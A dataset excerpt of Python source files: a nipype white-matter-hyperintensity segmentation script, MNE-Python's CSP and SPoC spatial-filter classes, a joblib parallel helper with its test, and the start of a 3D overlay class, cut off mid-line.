metadata
dict
text
stringlengths
60
3.49M
{ "source": "0rC0/WMHpypes", "score": 2 }
#### File: WMHpypes/scripts/segment_wmh.py ```python import sys, os, importlib import argparse import glob #sys.path.append(os.path.abspath('../')) from wmhpypes.interfaces import ibbmTum from wmhpypes.workflows import ibbmTum_wf from nipype.pipeline.engine import Workflow, Node from nipype import DataGrabber, DataSink, IdentityInterface, MapNode, JoinNode from nipype.interfaces.io import BIDSDataGrabber, DataFinder def make_workflow(): flairs = [os.path.abspath(i) for i in glob.glob(args.flair)] weights = [os.path.abspath(i) for i in glob.glob(args.weights)] weights_source = Node(interface=IdentityInterface(fields=['weights']), name='weights_source') weights_source.inputs.weights = weights data_source = Node(IdentityInterface(fields=['flairs']), name='data_source') data_source.iterables = ('flairs', flairs) sink = Node(interface=DataSink(), name = 'sink') sink.inputs.base_directory = wmh_dir sink.inputs.substitutions = [('_flairs_',''), ('_FLAIR.nii.gz/', '/'),] sink.inputs.regexp_substitutions = [('\.\..*\.\.', ''),] test_wf = ibbmTum_wf.get_test_wf(row_st=192, cols_st=192, thres_mask=10) wmh = Workflow(name='wmh', base_dir=wf_temp) wmh.connect(weights_source, 'weights', test_wf, 'inputspec.weights') wmh.connect(data_source, 'flairs', test_wf, 'inputspec.flair') wmh.connect(test_wf, 'outputspec.wmh_mask', sink, '@pred') return wmh def make_dirs(): global wf_temp, wmh_dir if not os.path.isdir(args.outdir): os.makedirs(args.outdir) wf_temp = os.path.abspath(os.path.join(args.outdir, 'wmh_temp')) wmh_dir = os.path.abspath(os.path.join(args.outdir, 'wmh')) if not os.path.isdir(wf_temp): os.makedirs(wf_temp) if not os.path.isdir(wmh_dir): os.makedirs(wmh_dir) def main(): print(os.getcwd()) make_dirs() wmh = make_workflow() #wmh.write_graph(graph2use='colored') #Image('./wf_work_dir/wmh/graph.png', width=200) wmh.run() #Single thread #plugin_args = {'n_procs': cores} #wmh.run(plugin='MultiProc', plugin_args=plugin_args) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-f','--flair', type=str, required=True) # parser.add_argument('-m','--mprage', type=str, required=False) # ToDo MPRage parser.add_argument('-w','--weights', type=str, required=True) parser.add_argument('-o','--outdir', type=str, required=True) parser.add_argument('-i','--indir', type=str, required=False, default='') args = parser.parse_args() main() ```
{ "source": "0reza/mne-python", "score": 3 }
#### File: mne/decoding/csp.py ```python import copy as cp import numpy as np from .base import BaseEstimator from .mixin import TransformerMixin from ..cov import _regularized_covariance from ..defaults import _INTERPOLATION_DEFAULT from ..fixes import pinv from ..utils import fill_doc, _check_option, _validate_type, copy_doc @fill_doc class CSP(TransformerMixin, BaseEstimator): """M/EEG signal decomposition using the Common Spatial Patterns (CSP). This class can be used as a supervised decomposition to estimate spatial filters for feature extraction. CSP in the context of EEG was first described in :footcite:`KolesEtAl1990`; a comprehensive tutorial on CSP can be found in :footcite:`BlankertzEtAl2008`. Multi-class solving is implemented from :footcite:`Grosse-WentrupBuss2008`. Parameters ---------- n_components : int (default 4) The number of components to decompose M/EEG signals. This number should be set by cross-validation. reg : float | str | None (default None) If not None (same as ``'empirical'``, default), allow regularization for covariance estimation. If float (between 0 and 1), shrinkage is used. For str values, ``reg`` will be passed as ``method`` to :func:`mne.compute_covariance`. log : None | bool (default None) If ``transform_into`` equals ``'average_power'`` and ``log`` is None or True, then apply a log transform to standardize features, else features are z-scored. If ``transform_into`` is ``'csp_space'``, ``log`` must be None. cov_est : 'concat' | 'epoch' (default 'concat') If ``'concat'``, covariance matrices are estimated on concatenated epochs for each class. If ``'epoch'``, covariance matrices are estimated on each epoch separately and then averaged over each class. transform_into : 'average_power' | 'csp_space' (default 'average_power') If 'average_power' then ``self.transform`` will return the average power of each spatial filter. If ``'csp_space'``, ``self.transform`` will return the data in CSP space. norm_trace : bool (default False) Normalize class covariance by its trace. Trace normalization is a step of the original CSP algorithm :footcite:`KolesEtAl1990` to eliminate magnitude variations in the EEG between individuals. It is not applied in more recent work :footcite:`BlankertzEtAl2008`, :footcite:`Grosse-WentrupBuss2008` and can have a negative impact on pattern order. cov_method_params : dict | None Parameters to pass to :func:`mne.compute_covariance`. .. versionadded:: 0.16 %(rank_none)s .. versionadded:: 0.17 component_order : 'mutual_info' | 'alternate' (default 'mutual_info') If ``'mutual_info'`` order components by decreasing mutual information (in the two-class case this uses a simplification which orders components by decreasing absolute deviation of the eigenvalues from 0.5 :footcite:`BarachantEtAl2010`). For the two-class case, ``'alternate'`` orders components by starting with the largest eigenvalue, followed by the smallest, the second-to-largest, the second-to-smallest, and so on :footcite:`BlankertzEtAl2008`. .. versionadded:: 0.21 Attributes ---------- filters_ : ndarray, shape (n_channels, n_channels) If fit, the CSP components used to decompose the data, else None. patterns_ : ndarray, shape (n_channels, n_channels) If fit, the CSP patterns used to restore M/EEG signals, else None. mean_ : ndarray, shape (n_components,) If fit, the mean squared power for each component. std_ : ndarray, shape (n_components,) If fit, the std squared power for each component. See Also -------- mne.preprocessing.Xdawn, SPoC References ---------- .. footbibliography:: """ def __init__(self, n_components=4, reg=None, log=None, cov_est='concat', transform_into='average_power', norm_trace=False, cov_method_params=None, rank=None, component_order='mutual_info'): # Init default CSP if not isinstance(n_components, int): raise ValueError('n_components must be an integer.') self.n_components = n_components self.rank = rank self.reg = reg # Init default cov_est if not (cov_est == "concat" or cov_est == "epoch"): raise ValueError("unknown covariance estimation method") self.cov_est = cov_est # Init default transform_into self.transform_into = _check_option('transform_into', transform_into, ['average_power', 'csp_space']) # Init default log if transform_into == 'average_power': if log is not None and not isinstance(log, bool): raise ValueError('log must be a boolean if transform_into == ' '"average_power".') else: if log is not None: raise ValueError('log must be a None if transform_into == ' '"csp_space".') self.log = log _validate_type(norm_trace, bool, 'norm_trace') self.norm_trace = norm_trace self.cov_method_params = cov_method_params self.component_order = _check_option('component_order', component_order, ('mutual_info', 'alternate')) def _check_Xy(self, X, y=None): """Check input data.""" if not isinstance(X, np.ndarray): raise ValueError("X should be of type ndarray (got %s)." % type(X)) if y is not None: if len(X) != len(y) or len(y) < 1: raise ValueError('X and y must have the same length.') if X.ndim < 3: raise ValueError('X must have at least 3 dimensions.') def fit(self, X, y): """Estimate the CSP decomposition on epochs. Parameters ---------- X : ndarray, shape (n_epochs, n_channels, n_times) The data on which to estimate the CSP. y : array, shape (n_epochs,) The class for each epoch. Returns ------- self : instance of CSP Returns the modified instance. """ self._check_Xy(X, y) self._classes = np.unique(y) n_classes = len(self._classes) if n_classes < 2: raise ValueError("n_classes must be >= 2.") if n_classes > 2 and self.component_order == 'alternate': raise ValueError("component_order='alternate' requires two " "classes, but data contains {} classes; use " "component_order='mutual_info' " "instead.".format(n_classes)) covs, sample_weights = self._compute_covariance_matrices(X, y) eigen_vectors, eigen_values = self._decompose_covs(covs, sample_weights) ix = self._order_components(covs, sample_weights, eigen_vectors, eigen_values, self.component_order) eigen_vectors = eigen_vectors[:, ix] self.filters_ = eigen_vectors.T self.patterns_ = pinv(eigen_vectors) pick_filters = self.filters_[:self.n_components] X = np.asarray([np.dot(pick_filters, epoch) for epoch in X]) # compute features (mean power) X = (X ** 2).mean(axis=2) # To standardize features self.mean_ = X.mean(axis=0) self.std_ = X.std(axis=0) return self def transform(self, X): """Estimate epochs sources given the CSP filters. Parameters ---------- X : array, shape (n_epochs, n_channels, n_times) The data. Returns ------- X : ndarray If self.transform_into == 'average_power' then returns the power of CSP features averaged over time and shape (n_epochs, n_sources) If self.transform_into == 'csp_space' then returns the data in CSP space and shape is (n_epochs, n_sources, n_times). """ if not isinstance(X, np.ndarray): raise ValueError("X should be of type ndarray (got %s)." % type(X)) if self.filters_ is None: raise RuntimeError('No filters available. Please first fit CSP ' 'decomposition.') pick_filters = self.filters_[:self.n_components] X = np.asarray([np.dot(pick_filters, epoch) for epoch in X]) # compute features (mean band power) if self.transform_into == 'average_power': X = (X ** 2).mean(axis=2) log = True if self.log is None else self.log if log: X = np.log(X) else: X -= self.mean_ X /= self.std_ return X @copy_doc(TransformerMixin.fit_transform) def fit_transform(self, X, y, **fit_params): # noqa: D102 return super().fit_transform(X, y=y, **fit_params) @fill_doc def plot_patterns(self, info, components=None, ch_type=None, vmin=None, vmax=None, cmap='RdBu_r', sensors=True, colorbar=True, scalings=None, units='a.u.', res=64, size=1, cbar_fmt='%3.1f', name_format='CSP%01d', show=True, show_names=False, title=None, mask=None, mask_params=None, outlines='head', contours=6, image_interp=_INTERPOLATION_DEFAULT, average=None, sphere=None): """Plot topographic patterns of components. The patterns explain how the measured data was generated from the neural sources (a.k.a. the forward model). Parameters ---------- %(info_not_none)s Used for fitting. If not available, consider using :func:`mne.create_info`. components : float | array of float | None The patterns to plot. If None, n_components will be shown. ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None The channel type to plot. For 'grad', the gradiometers are collected in pairs and the RMS for each pair is plotted. If None, then first available channel type from order given above is used. Defaults to None. vmin : float | callable The value specifying the lower bound of the color range. If None, and vmax is None, -vmax is used. Else np.min(data). If callable, the output equals vmin(data). vmax : float | callable The value specifying the upper bound of the color range. If None, the maximum absolute value is used. If vmin is None, but vmax is not, default np.min(data). If callable, the output equals vmax(data). cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None Colormap to use. If tuple, the first value indicates the colormap to use and the second value is a boolean defining interactivity. In interactive mode the colors are adjustable by clicking and dragging the colorbar with left and right mouse button. Left mouse button moves the scale up and down and right mouse button adjusts the range. Hitting space bar resets the range. Up and down arrows can be used to change the colormap. If None, 'Reds' is used for all positive data, otherwise defaults to 'RdBu_r'. If 'interactive', translates to (None, True). Defaults to 'RdBu_r'. .. warning:: Interactive mode works smoothly only for a small amount of topomaps. sensors : bool | str Add markers for sensor locations to the plot. Accepts matplotlib plot format string (e.g., 'r+' for red plusses). If True, a circle will be used (via .add_artist). Defaults to True. colorbar : bool Plot a colorbar. scalings : dict | float | None The scalings of the channel types to be applied for plotting. If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``. units : dict | str | None The unit of the channel type used for colorbar label. If scale is None the unit is automatically determined. res : int The resolution of the topomap image (n pixels along each side). size : float Side length per topomap in inches. cbar_fmt : str String format for colorbar values. name_format : str String format for topomap values. Defaults to "CSP%%01d". show : bool Show figure if True. show_names : bool | callable If True, show channel names on top of the map. If a callable is passed, channel names will be formatted using the callable; e.g., to delete the prefix 'MEG ' from all channel names, pass the function lambda x: x.replace('MEG ', ''). If ``mask`` is not None, only significant sensors will be shown. title : str | None Title. If None (default), no title is displayed. %(mask_patterns_topomap)s %(mask_params_topomap)s %(outlines_topomap)s contours : int | array of float The number of contour lines to draw. If 0, no contours will be drawn. When an integer, matplotlib ticker locator is used to find suitable values for the contour thresholds (may sometimes be inaccurate, use array for accuracy). If an array, the values represent the levels for the contours. Defaults to 6. %(image_interp_topomap)s average : float | None The time window around a given time to be used for averaging (seconds). For example, 0.01 would translate into window that starts 5 ms before and ends 5 ms after a given time point. Defaults to None, which means no averaging. %(sphere_topomap_auto)s Returns ------- fig : instance of matplotlib.figure.Figure The figure. """ from .. import EvokedArray if components is None: components = np.arange(self.n_components) # set sampling frequency to have 1 component per time point info = cp.deepcopy(info) with info._unlock(): info['sfreq'] = 1. # create an evoked patterns = EvokedArray(self.patterns_.T, info, tmin=0) # the call plot_topomap return patterns.plot_topomap( times=components, ch_type=ch_type, vmin=vmin, vmax=vmax, cmap=cmap, colorbar=colorbar, res=res, cbar_fmt=cbar_fmt, sensors=sensors, scalings=scalings, units=units, time_unit='s', time_format=name_format, size=size, show_names=show_names, title=title, mask_params=mask_params, mask=mask, outlines=outlines, contours=contours, image_interp=image_interp, show=show, average=average, sphere=sphere) @fill_doc def plot_filters(self, info, components=None, ch_type=None, vmin=None, vmax=None, cmap='RdBu_r', sensors=True, colorbar=True, scalings=None, units='a.u.', res=64, size=1, cbar_fmt='%3.1f', name_format='CSP%01d', show=True, show_names=False, title=None, mask=None, mask_params=None, outlines='head', contours=6, image_interp=_INTERPOLATION_DEFAULT, average=None): """Plot topographic filters of components. The filters are used to extract discriminant neural sources from the measured data (a.k.a. the backward model). Parameters ---------- %(info_not_none)s Used for fitting. If not available, consider using :func:`mne.create_info`. components : float | array of float | None The patterns to plot. If None, n_components will be shown. ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None The channel type to plot. For 'grad', the gradiometers are collected in pairs and the RMS for each pair is plotted. If None, then first available channel type from order given above is used. Defaults to None. vmin : float | callable The value specifying the lower bound of the color range. If None, and vmax is None, -vmax is used. Else np.min(data). If callable, the output equals vmin(data). vmax : float | callable The value specifying the upper bound of the color range. If None, the maximum absolute value is used. If vmin is None, but vmax is not, defaults to np.min(data). If callable, the output equals vmax(data). cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None Colormap to use. If tuple, the first value indicates the colormap to use and the second value is a boolean defining interactivity. In interactive mode the colors are adjustable by clicking and dragging the colorbar with left and right mouse button. Left mouse button moves the scale up and down and right mouse button adjusts the range. Hitting space bar resets the range. Up and down arrows can be used to change the colormap. If None, 'Reds' is used for all positive data, otherwise defaults to 'RdBu_r'. If 'interactive', translates to (None, True). Defaults to 'RdBu_r'. .. warning:: Interactive mode works smoothly only for a small amount of topomaps. sensors : bool | str Add markers for sensor locations to the plot. Accepts matplotlib plot format string (e.g., 'r+' for red plusses). If True, a circle will be used (via .add_artist). Defaults to True. colorbar : bool Plot a colorbar. scalings : dict | float | None The scalings of the channel types to be applied for plotting. If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``. units : dict | str | None The unit of the channel type used for colorbar label. If scale is None the unit is automatically determined. res : int The resolution of the topomap image (n pixels along each side). size : float Side length per topomap in inches. cbar_fmt : str String format for colorbar values. name_format : str String format for topomap values. Defaults to "CSP%%01d". show : bool Show figure if True. show_names : bool | callable If True, show channel names on top of the map. If a callable is passed, channel names will be formatted using the callable; e.g., to delete the prefix 'MEG ' from all channel names, pass the function lambda x: x.replace('MEG ', ''). If ``mask`` is not None, only significant sensors will be shown. title : str | None Title. If None (default), no title is displayed. mask : ndarray of bool, shape (n_channels, n_times) | None The channels to be marked as significant at a given time point. Indices set to `True` will be considered. Defaults to None. mask_params : dict | None Additional plotting parameters for plotting significant sensors. Default (None) equals:: dict(marker='o', markerfacecolor='w', markeredgecolor='k', linewidth=0, markersize=4) %(outlines_topomap)s contours : int | array of float The number of contour lines to draw. If 0, no contours will be drawn. When an integer, matplotlib ticker locator is used to find suitable values for the contour thresholds (may sometimes be inaccurate, use array for accuracy). If an array, the values represent the levels for the contours. Defaults to 6. %(image_interp_topomap)s average : float | None The time window around a given time to be used for averaging (seconds). For example, 0.01 would translate into window that starts 5 ms before and ends 5 ms after a given time point. Defaults to None, which means no averaging. Returns ------- fig : instance of matplotlib.figure.Figure The figure. """ from .. import EvokedArray if components is None: components = np.arange(self.n_components) # set sampling frequency to have 1 component per time point info = cp.deepcopy(info) with info._unlock(): info['sfreq'] = 1. # create an evoked filters = EvokedArray(self.filters_.T, info, tmin=0) # the call plot_topomap return filters.plot_topomap( times=components, ch_type=ch_type, vmin=vmin, vmax=vmax, cmap=cmap, colorbar=colorbar, res=res, cbar_fmt=cbar_fmt, sensors=sensors, scalings=scalings, units=units, time_unit='s', time_format=name_format, size=size, show_names=show_names, title=title, mask_params=mask_params, mask=mask, outlines=outlines, contours=contours, image_interp=image_interp, show=show, average=average) def _compute_covariance_matrices(self, X, y): _, n_channels, _ = X.shape if self.cov_est == "concat": cov_estimator = self._concat_cov elif self.cov_est == "epoch": cov_estimator = self._epoch_cov covs = [] sample_weights = [] for this_class in self._classes: cov, weight = cov_estimator(X[y == this_class]) if self.norm_trace: cov /= np.trace(cov) covs.append(cov) sample_weights.append(weight) return np.stack(covs), np.array(sample_weights) def _concat_cov(self, x_class): """Concatenate epochs before computing the covariance.""" _, n_channels, _ = x_class.shape x_class = np.transpose(x_class, [1, 0, 2]) x_class = x_class.reshape(n_channels, -1) cov = _regularized_covariance( x_class, reg=self.reg, method_params=self.cov_method_params, rank=self.rank) weight = x_class.shape[0] return cov, weight def _epoch_cov(self, x_class): """Mean of per-epoch covariances.""" cov = sum(_regularized_covariance( this_X, reg=self.reg, method_params=self.cov_method_params, rank=self.rank) for this_X in x_class) cov /= len(x_class) weight = len(x_class) return cov, weight def _decompose_covs(self, covs, sample_weights): from scipy import linalg n_classes = len(covs) if n_classes == 2: eigen_values, eigen_vectors = linalg.eigh(covs[0], covs.sum(0)) else: # The multiclass case is adapted from # http://github.com/alexandrebarachant/pyRiemann eigen_vectors, D = _ajd_pham(covs) eigen_vectors = self._normalize_eigenvectors(eigen_vectors.T, covs, sample_weights) eigen_values = None return eigen_vectors, eigen_values def _compute_mutual_info(self, covs, sample_weights, eigen_vectors): class_probas = sample_weights / sample_weights.sum() mutual_info = [] for jj in range(eigen_vectors.shape[1]): aa, bb = 0, 0 for (cov, prob) in zip(covs, class_probas): tmp = np.dot(np.dot(eigen_vectors[:, jj].T, cov), eigen_vectors[:, jj]) aa += prob * np.log(np.sqrt(tmp)) bb += prob * (tmp ** 2 - 1) mi = - (aa + (3.0 / 16) * (bb ** 2)) mutual_info.append(mi) return mutual_info def _normalize_eigenvectors(self, eigen_vectors, covs, sample_weights): # Here we apply an euclidean mean. See pyRiemann for other metrics mean_cov = np.average(covs, axis=0, weights=sample_weights) for ii in range(eigen_vectors.shape[1]): tmp = np.dot(np.dot(eigen_vectors[:, ii].T, mean_cov), eigen_vectors[:, ii]) eigen_vectors[:, ii] /= np.sqrt(tmp) return eigen_vectors def _order_components(self, covs, sample_weights, eigen_vectors, eigen_values, component_order): n_classes = len(self._classes) if component_order == 'mutual_info' and n_classes > 2: mutual_info = self._compute_mutual_info(covs, sample_weights, eigen_vectors) ix = np.argsort(mutual_info)[::-1] elif component_order == 'mutual_info' and n_classes == 2: ix = np.argsort(np.abs(eigen_values - 0.5))[::-1] elif component_order == 'alternate' and n_classes == 2: i = np.argsort(eigen_values) ix = np.empty_like(i) ix[1::2] = i[:len(i) // 2] ix[0::2] = i[len(i) // 2:][::-1] return ix def _ajd_pham(X, eps=1e-6, max_iter=15): """Approximate joint diagonalization based on Pham's algorithm. This is a direct implementation of the PHAM's AJD algorithm [1]. Parameters ---------- X : ndarray, shape (n_epochs, n_channels, n_channels) A set of covariance matrices to diagonalize. eps : float, default 1e-6 The tolerance for stopping criterion. max_iter : int, default 1000 The maximum number of iteration to reach convergence. Returns ------- V : ndarray, shape (n_channels, n_channels) The diagonalizer. D : ndarray, shape (n_epochs, n_channels, n_channels) The set of quasi diagonal matrices. References ---------- .. [1] Pham, <NAME>. "Joint approximate diagonalization of positive definite Hermitian matrices." SIAM Journal on Matrix Analysis and Applications 22, no. 4 (2001): 1136-1152. """ # Adapted from http://github.com/alexandrebarachant/pyRiemann n_epochs = X.shape[0] # Reshape input matrix A = np.concatenate(X, axis=0).T # Init variables n_times, n_m = A.shape V = np.eye(n_times) epsilon = n_times * (n_times - 1) * eps for it in range(max_iter): decr = 0 for ii in range(1, n_times): for jj in range(ii): Ii = np.arange(ii, n_m, n_times) Ij = np.arange(jj, n_m, n_times) c1 = A[ii, Ii] c2 = A[jj, Ij] g12 = np.mean(A[ii, Ij] / c1) g21 = np.mean(A[ii, Ij] / c2) omega21 = np.mean(c1 / c2) omega12 = np.mean(c2 / c1) omega = np.sqrt(omega12 * omega21) tmp = np.sqrt(omega21 / omega12) tmp1 = (tmp * g12 + g21) / (omega + 1) tmp2 = (tmp * g12 - g21) / max(omega - 1, 1e-9) h12 = tmp1 + tmp2 h21 = np.conj((tmp1 - tmp2) / tmp) decr += n_epochs * (g12 * np.conj(h12) + g21 * h21) / 2.0 tmp = 1 + 1.j * 0.5 * np.imag(h12 * h21) tmp = np.real(tmp + np.sqrt(tmp ** 2 - h12 * h21)) tau = np.array([[1, -h12 / tmp], [-h21 / tmp, 1]]) A[[ii, jj], :] = np.dot(tau, A[[ii, jj], :]) tmp = np.c_[A[:, Ii], A[:, Ij]] tmp = np.reshape(tmp, (n_times * n_epochs, 2), order='F') tmp = np.dot(tmp, tau.T) tmp = np.reshape(tmp, (n_times, n_epochs * 2), order='F') A[:, Ii] = tmp[:, :n_epochs] A[:, Ij] = tmp[:, n_epochs:] V[[ii, jj], :] = np.dot(tau, V[[ii, jj], :]) if decr < epsilon: break D = np.reshape(A, (n_times, -1, n_times)).transpose(1, 0, 2) return V, D @fill_doc class SPoC(CSP): """Implementation of the SPoC spatial filtering. Source Power Comodulation (SPoC) :footcite:`DahneEtAl2014` allows to extract spatial filters and patterns by using a target (continuous) variable in the decomposition process in order to give preference to components whose power correlates with the target variable. SPoC can be seen as an extension of the CSP driven by a continuous variable rather than a discrete variable. Typical applications include extraction of motor patterns using EMG power or audio patterns using sound envelope. Parameters ---------- n_components : int The number of components to decompose M/EEG signals. reg : float | str | None (default None) If not None (same as ``'empirical'``, default), allow regularization for covariance estimation. If float, shrinkage is used (0 <= shrinkage <= 1). For str options, ``reg`` will be passed to ``method`` to :func:`mne.compute_covariance`. log : None | bool (default None) If transform_into == 'average_power' and log is None or True, then applies a log transform to standardize the features, else the features are z-scored. If transform_into == 'csp_space', then log must be None. transform_into : {'average_power', 'csp_space'} If 'average_power' then self.transform will return the average power of each spatial filter. If 'csp_space' self.transform will return the data in CSP space. Defaults to 'average_power'. cov_method_params : dict | None Parameters to pass to :func:`mne.compute_covariance`. .. versionadded:: 0.16 %(rank_none)s .. versionadded:: 0.17 Attributes ---------- filters_ : ndarray, shape (n_channels, n_channels) If fit, the SPoC spatial filters, else None. patterns_ : ndarray, shape (n_channels, n_channels) If fit, the SPoC spatial patterns, else None. mean_ : ndarray, shape (n_components,) If fit, the mean squared power for each component. std_ : ndarray, shape (n_components,) If fit, the std squared power for each component. See Also -------- mne.preprocessing.Xdawn, CSP References ---------- .. footbibliography:: """ def __init__(self, n_components=4, reg=None, log=None, transform_into='average_power', cov_method_params=None, rank=None): """Init of SPoC.""" super(SPoC, self).__init__(n_components=n_components, reg=reg, log=log, cov_est="epoch", norm_trace=False, transform_into=transform_into, rank=rank, cov_method_params=cov_method_params) # Covariance estimation have to be done on the single epoch level, # unlike CSP where covariance estimation can also be achieved through # concatenation of all epochs from the same class. delattr(self, 'cov_est') delattr(self, 'norm_trace') def fit(self, X, y): """Estimate the SPoC decomposition on epochs. Parameters ---------- X : ndarray, shape (n_epochs, n_channels, n_times) The data on which to estimate the SPoC. y : array, shape (n_epochs,) The class for each epoch. Returns ------- self : instance of SPoC Returns the modified instance. """ from scipy import linalg self._check_Xy(X, y) if len(np.unique(y)) < 2: raise ValueError("y must have at least two distinct values.") # The following code is directly copied from pyRiemann # Normalize target variable target = y.astype(np.float64) target -= target.mean() target /= target.std() n_epochs, n_channels = X.shape[:2] # Estimate single trial covariance covs = np.empty((n_epochs, n_channels, n_channels)) for ii, epoch in enumerate(X): covs[ii] = _regularized_covariance( epoch, reg=self.reg, method_params=self.cov_method_params, rank=self.rank) C = covs.mean(0) Cz = np.mean(covs * target[:, np.newaxis, np.newaxis], axis=0) # solve eigenvalue decomposition evals, evecs = linalg.eigh(Cz, C) evals = evals.real evecs = evecs.real # sort vectors ix = np.argsort(np.abs(evals))[::-1] # sort eigenvectors evecs = evecs[:, ix].T # spatial patterns self.patterns_ = linalg.pinv(evecs).T # n_channels x n_channels self.filters_ = evecs # n_channels x n_channels pick_filters = self.filters_[:self.n_components] X = np.asarray([np.dot(pick_filters, epoch) for epoch in X]) # compute features (mean band power) X = (X ** 2).mean(axis=-1) # To standardize features self.mean_ = X.mean(axis=0) self.std_ = X.std(axis=0) return self def transform(self, X): """Estimate epochs sources given the SPoC filters. Parameters ---------- X : array, shape (n_epochs, n_channels, n_times) The data. Returns ------- X : ndarray If self.transform_into == 'average_power' then returns the power of CSP features averaged over time and shape (n_epochs, n_sources) If self.transform_into == 'csp_space' then returns the data in CSP space and shape is (n_epochs, n_sources, n_times). """ return super(SPoC, self).transform(X) ``` #### File: mne-python/mne/parallel.py ```python import logging import multiprocessing import os from . import get_config from .utils import (logger, verbose, warn, ProgressBar, _validate_type, _check_option, _ensure_int, deprecated) @verbose def parallel_func(func, n_jobs, max_nbytes='auto', pre_dispatch='n_jobs', total=None, prefer=None, *, max_jobs=None, verbose=None): """Return parallel instance with delayed function. Util function to use joblib only if available Parameters ---------- func : callable A function. %(n_jobs)s max_nbytes : int, str, or None Threshold on the minimum size of arrays passed to the workers that triggers automated memory mapping. Can be an int in Bytes, or a human-readable string, e.g., '1M' for 1 megabyte. Use None to disable memmaping of large arrays. Use 'auto' to use the value set using mne.set_memmap_min_size. pre_dispatch : int, or str, optional See :class:`joblib.Parallel`. total : int | None If int, use a progress bar to display the progress of dispatched jobs. This should only be used when directly iterating, not when using ``split_list`` or :func:`np.array_split`. If None (default), do not add a progress bar. prefer : str | None If str, can be "processes" or "threads". See :class:`joblib.Parallel`. .. versionadded:: 0.18 max_jobs : int | None The upper limit of jobs to use. This is useful when you know ahead of a the maximum number of calls into :class:`joblib.Parallel` that you will possibly want or need, and the returned ``n_jobs`` should not exceed this value regardless of how many jobs the user requests. %(verbose)s INFO or DEBUG will print parallel status, others will not. Returns ------- parallel: instance of joblib.Parallel or list The parallel object. my_func: callable ``func`` if not parallel or delayed(func). n_jobs: int Number of jobs >= 1. """ should_print = (logger.level <= logging.INFO) # for a single job, we don't need joblib _validate_type(n_jobs, ('int-like', None)) if n_jobs != 1: try: from joblib import Parallel, delayed except ImportError: if n_jobs is not None: warn('joblib not installed. Cannot run in parallel.') n_jobs = 1 if n_jobs == 1: n_jobs = 1 my_func = func parallel = list else: # check if joblib is recent enough to support memmaping cache_dir = get_config('MNE_CACHE_DIR', None) if isinstance(max_nbytes, str) and max_nbytes == 'auto': max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None) if max_nbytes is not None and cache_dir is None: logger.info( 'joblib supports memapping pool but "MNE_CACHE_DIR" ' 'is not set in MNE-Python config. To enable it, use, ' 'e.g., mne.set_cache_dir(\'/tmp/shm\'). This will ' 'store temporary files under /dev/shm and can result ' 'in large memory savings.') # create keyword arguments for Parallel kwargs = {'verbose': 5 if should_print and total is None else 0} kwargs['pre_dispatch'] = pre_dispatch kwargs['prefer'] = prefer if cache_dir is None: max_nbytes = None # disable memmaping kwargs['temp_folder'] = cache_dir kwargs['max_nbytes'] = max_nbytes parallel = Parallel(n_jobs, **kwargs) n_jobs = _check_n_jobs(parallel.n_jobs) if max_jobs is not None: n_jobs = min(n_jobs, max(_ensure_int(max_jobs, 'max_jobs'), 1)) my_func = delayed(func) if total is not None: def parallel_progress(op_iter): return parallel(ProgressBar(iterable=op_iter, max_value=total)) parallel_out = parallel_progress else: parallel_out = parallel return parallel_out, my_func, n_jobs # this isn't really meant to be public but it's easy enough to deprecate @deprecated('check_n_jobs is deprecated and will be removed in 1.1, use ' 'parallel_func directly') def check_n_jobs(n_jobs, allow_cuda=False): """Check n_jobs in particular for negative values. Parameters ---------- n_jobs : int The number of jobs. allow_cuda : bool Allow n_jobs to be 'cuda'. Default: False. Returns ------- n_jobs : int The checked number of jobs. Always positive (or 'cuda' if applicable). """ types = ('int-like', None) if allow_cuda: types = types + ('str',) _validate_type(n_jobs, types, 'n_jobs') if isinstance(n_jobs, str): # We can only be in this path if allow_cuda _check_option('n_jobs', n_jobs, ('cuda',), extra='when str') return 'cuda' # return 'cuda' return _check_n_jobs(n_jobs) def _check_n_jobs(n_jobs): n_jobs = _ensure_int(n_jobs, 'n_jobs', must_be='an int or None') if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1') and \ n_jobs != 1: n_jobs = 1 logger.info('... MNE_FORCE_SERIAL set. Processing in forced ' 'serial mode.') elif n_jobs <= 0: n_cores = multiprocessing.cpu_count() n_jobs_orig = n_jobs n_jobs = min(n_cores + n_jobs + 1, n_cores) if n_jobs <= 0: raise ValueError( f'If n_jobs has a non-positive value ({n_jobs_orig}) it must ' f'not be less than the number of CPUs present ({n_cores})') return n_jobs ``` #### File: mne/tests/test_parallel.py ```python from contextlib import nullcontext import multiprocessing import os import pytest from mne.parallel import parallel_func @pytest.mark.parametrize('n_jobs', [ None, 1, -1, 'loky 2', 'threading 3', 'multiprocessing 4', ]) def test_parallel_func(n_jobs): """Test Parallel wrapping.""" joblib = pytest.importorskip('joblib') if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1'): pytest.skip('MNE_FORCE_SERIAL cannot be set') def fun(x): return x * 2 if isinstance(n_jobs, str): backend, n_jobs = n_jobs.split() n_jobs = want_jobs = int(n_jobs) ctx = joblib.parallel_backend(backend, n_jobs) n_jobs = None else: ctx = nullcontext() if n_jobs is not None and n_jobs < 0: want_jobs = multiprocessing.cpu_count() + 1 + n_jobs else: want_jobs = 1 with ctx: parallel, p_fun, got_jobs = parallel_func(fun, n_jobs) assert got_jobs == want_jobs ``` #### File: mne/viz/_3d_overlay.py ```python from collections import OrderedDict import numpy as np from ..utils import logger class _Overlay(object): def __init__(self, scalars, colormap, rng, opacity, name): self._scalars = scalars self._colormap = colormap assert rng is not None self._rng = rng self._opacity = opacity self._name = name def to_colors(self): from ._3d import _get_cmap from matplotlib.colors import Colormap, ListedColormap if isinstance(self._colormap, str): cmap = _get_cmap(self._colormap) elif isinstance(self._colormap, Colormap): cmap = self._colormap else: cmap = ListedColormap( self._colormap / 255., name=str(type(self._colormap))) logger.debug( f'Color mapping {repr(self._name)} with {cmap.name} ' f'colormap and range {self._rng}') rng = self._rng assert rng is not None scalars = self._norm(rng) colors = cmap(scalars) if self._opacity is not None: colors[:, 3] *= self._opacity return colors def _norm(self, rng): if rng[0] == rng[1]: factor = 1 if rng[0] == 0 else 1e-6 * rng[0] else: factor = 